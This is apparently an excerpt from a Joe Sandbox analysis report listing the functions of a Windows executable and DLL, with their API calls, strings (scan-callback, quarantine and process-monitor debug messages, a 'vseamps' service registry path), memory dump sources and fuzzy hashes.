                                                                                        • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                                                        • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                        • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                                                        • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                                                        • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                                                        • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1232609184-0
                                                                                        • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                        • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                                                        • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                                        • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                                                        • String ID: H
                                                                                        • API String ID: 2107338056-2852464175
                                                                                        • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                        • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                                                        • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                                        • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                                                        • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                                                        • API String ID: 1322048431-2685357988
                                                                                        • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                        • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                                                        • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                                        • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                                        • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                                                        • API String ID: 2984211723-3002863673
                                                                                        • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                        • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                                                        • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                                        • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                                                        • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                                                        • API String ID: 678758403-4129911376
                                                                                        • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                        • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                                                        • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                                        • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcesslstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3424473247-0
                                                                                        • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                        • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                                                                        • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                                                                        • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                                                        • String ID: bad exception$csm$csm$csm
                                                                                        • API String ID: 3766904988-820278400
                                                                                        • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                        • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                                                        • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                                                        • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2707001247-0
                                                                                        • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                        • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                                                        • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                                                        • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 849930591-393685449
                                                                                        • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                        • Instruction ID: fd499993ccf6b9c91935bab5288eeea4ce333aaa0ffc7c6b8897070e7816e7d5
                                                                                        • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                                                        • Instruction Fuzzy Hash: 23D191B2B0CB4186EB609B66D4403BD7BB1FB46BA8F1051B6DA4D57B66DF38E481C700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                        • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                                                        • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                                                        • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                        • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                                                        • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                                                        • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeLibraryProc
                                                                                        • String ID: api-ms-$ext-ms-
                                                                                        • API String ID: 3013587201-537541572
                                                                                        • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                        • Instruction ID: 2bbef90cf95eb59c916a94d88193a724d16daee8ae5a7db9860beb69f51ae72f
                                                                                        • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                                                        • Instruction Fuzzy Hash: 9A41B165B1DE0291EA168B17A8106BA2392BF06FF0F5A45B7DD0E477A4FE3CE4468340
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                                                        • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                        • API String ID: 1119674940-1966266597
                                                                                        • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                        • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                                                        • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                                                        • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                                                        • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                        • API String ID: 3702919091-996641649
                                                                                        • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                        • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                                                        • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                                                        • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                                                        • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271364265.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271351725.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271380467.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271393735.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                                                        • Associated: 00000004.00000002.2271406712.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_140000000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$Info
                                                                                        • String ID:
                                                                                        • API String ID: 1775632426-0
                                                                                        • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                        • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                                                        • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                                                        • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171B1
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171BF
                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A5171E9
                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A517257
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FFE1A5172EB,?,?,?,00007FFE1A513EC0,?,?,?,?,00007FFE1A513CFD), ref: 00007FFE1A517263
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 2559590344-2084034818
                                                                                        • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                        • Instruction ID: 5a141423fb5ada6dbdd1ba32ead31d9645ad61be14c52575c1722e978c5a716d
                                                                                        • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                                                        • Instruction Fuzzy Hash: 7C31B421B1EE4191EE159B47A4009B92396BF4AFB0F5906F7ED2D07760EF3CE4468700
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 2506987500-0
                                                                                        • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                        • Instruction ID: 30ea2a9775190e9d0a7abad356b8981684c8d2552a67def043a4f5008471f38a
                                                                                        • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                                                        • Instruction Fuzzy Hash: 1A216F24B0CE4289FA69A36355911796163AF46FB0F1407F7E93E47AF6EE6CB4418240
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2271432825.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2271420314.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271452651.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271467117.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2271479904.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_7ffe1a510000_BEqRkb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                        • String ID: CONOUT$
                                                                                        • API String ID: 3230265001-3130406586
                                                                                        • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                        • Instruction ID: 22a65687c932797a1dd63702ae1da1b25bf2878d2e8631af4845515c2a202a38
                                                                                        • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                                                        • Instruction Fuzzy Hash: C9119A32B1CE41C2E3508B93A84473962A2BB89FF4F5002B7EA5D87BA4DF3CD9048744
                                                                                        APIs
                                                                                        • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                                                        • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                                                          • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                                                          • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
